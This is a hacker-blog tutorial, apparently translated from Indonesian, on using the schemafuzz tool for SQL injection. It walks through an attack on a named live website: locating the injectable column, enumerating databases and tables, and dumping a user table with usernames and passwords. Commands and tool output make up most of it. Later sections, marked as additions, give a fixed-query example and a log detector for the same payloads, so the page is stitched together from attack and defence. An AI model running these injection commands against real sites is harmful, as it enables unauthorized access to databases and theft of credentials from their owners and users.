AXXERX55 : Hacker Area: TUTORIAL SCHEMAFUZZ


TUTORIAL SCHEMAFUZZ

Tools:

1. Python
2. Schemafuzz
3. CMD

In CMD, change to the folder that contains schemafuzz.py.
Start each command with this format:
schemafuzz.py -u "url target" --perintah
(where --perintah is the command; the list of commands is at the bottom.)
1. Find a target
For example: http://www.ditplb.or.id/profile.php?id=1

2. Run the command that finds the columns
For example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Output:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+] Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: http://www.ditplb.or.id/profile.php?id= ... CT+0,1,2--

[+] darkc0de URL: http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de
[-] Done!



So we use http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de for the injection.

3. Find the database with the --dbs command
For example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs
Output:
[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


You can see the database name, right? t15618_plb

4. Find the table names in the database
For example (namadatabase = the database name): schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D namadatabase
Which becomes: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb
Output:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


So that site has 11 tables, and the column names are already there too. Now just pick which one to lay bare... hehehe (as if it were a girl)

5. View the contents of a table and its columns
For example (namadatabase, namatable, namakolom = the database, table and column names): schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dump -D namadatabase -T namatable -C namakolom
Which becomes: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Output:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13



[-] 20:54:14

[-] Total URL Requests 15

[-] Done

Whoa... how come the user IDs and passwords aren't encrypted? Hehehe, a lucky break.
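
Why the id parameter used in the steps above is injectable, and the fix, as an added example (not code from this blog or from the site). It assumes profile.php builds its query by string concatenation, uses an in-memory SQLite table as a stand-in for the MySQL profile table listed in step 4, and all rows and function names are constructed.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the page's MySQL schema; the row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profile (ID_Profile INTEGER PRIMARY KEY, sinopsis TEXT, Profile TEXT);
        INSERT INTO profile VALUES (1, 'constructed synopsis', 'constructed body');
    """)
    return conn

# Decoded form of the value the tutorial puts in ?id= ("+" is a space in a URL).
# The marker is quoted here so that it is a plain string literal.
UNION_VALUE = "1 AND 1=2 UNION SELECT 0,1,'darkc0de'"

def get_profile_vulnerable(conn, raw_id):
    # Assumed shape of the flaw: request data becomes part of the SQL text,
    # so the value can append clauses of its own.
    sql = "SELECT ID_Profile, sinopsis, Profile FROM profile WHERE ID_Profile = " + raw_id
    return conn.execute(sql).fetchall()

def get_profile_hardened(conn, raw_id):
    # 1) Allow-list: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # 2) Bound parameter: the value travels as data and is never parsed as SQL.
    sql = "SELECT ID_Profile, sinopsis, Profile FROM profile WHERE ID_Profile = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(get_profile_vulnerable(db, UNION_VALUE))  # row chosen by the request
    print(get_profile_hardened(db, UNION_VALUE))    # rejected before the query
    print(get_profile_hardened(db, "1"))            # normal lookup still works
```

The same two controls apply in PHP through prepared statements (PDO or mysqli); the database account should also be limited to the tables the page needs.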

The method above applies to SQL version 5; for version 4, use the --fuzz command to find the table and column names.
For example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --fuzz

Command types (as I understand them):
--fuzz << finds column and table names on SQL v4
--schema << shows table names
--dump << shows column contents
--findcol << finds the darkc0de (column)
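
Detection logic for the request shape these commands produce, added here and not part of the original post or of schemafuzz. It decodes query values from constructed access-log lines and looks for the UNION SELECT, AND 1=2, trailing -- and darkc0de marker seen in the output above; the log format, IP addresses, paths and function names are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:20:36:29 +0700] "GET /profile.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:20:36:30 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2-- HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2024:20:36:31 +0700] "GET /profile.php?id=1%20AND%201%3D2%20UNION%20SELECT%200,1,darkc0de-- HTTP/1.1" 200 812
198.51.100.4 - - [01/Jan/2024:20:40:02 +0700] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 900
198.51.100.4 - - [01/Jan/2024:20:40:09 +0700] "GET /profile.php?id=2 HTTP/1.1" 200 5090
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

# Signals taken from the request shape shown in the tutorial output.
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "false_condition": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
    # Assumption: the marker only shows up in logs if it is sent unsubstituted.
    "darkc0de_marker": re.compile(r"darkc0de", re.I),
}

def signals_in(target):
    """Return the sorted signal names matched by any decoded query value."""
    found = set()
    # parse_qsl decodes both '+' and %xx, which undoes the "+" evasion.
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        found.update(name for name, rx in SIGNALS.items() if rx.search(value))
    return sorted(found)

def suspicious_requests(log_text, min_signals=2):
    """Return (client, target, signals) for requests matching >= min_signals."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, target = m.groups()
        sig = signals_in(target)
        if len(sig) >= min_signals:
            hits.append((client, target, sig))
    return hits

def hits_per_client(log_text):
    """Count flagged requests per client to surface enumeration bursts."""
    return Counter(client for client, _, _ in suspicious_requests(log_text))
```

Requiring two signals keeps the constructed search for "student union select committee" from being flagged while both injection-shaped requests are.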
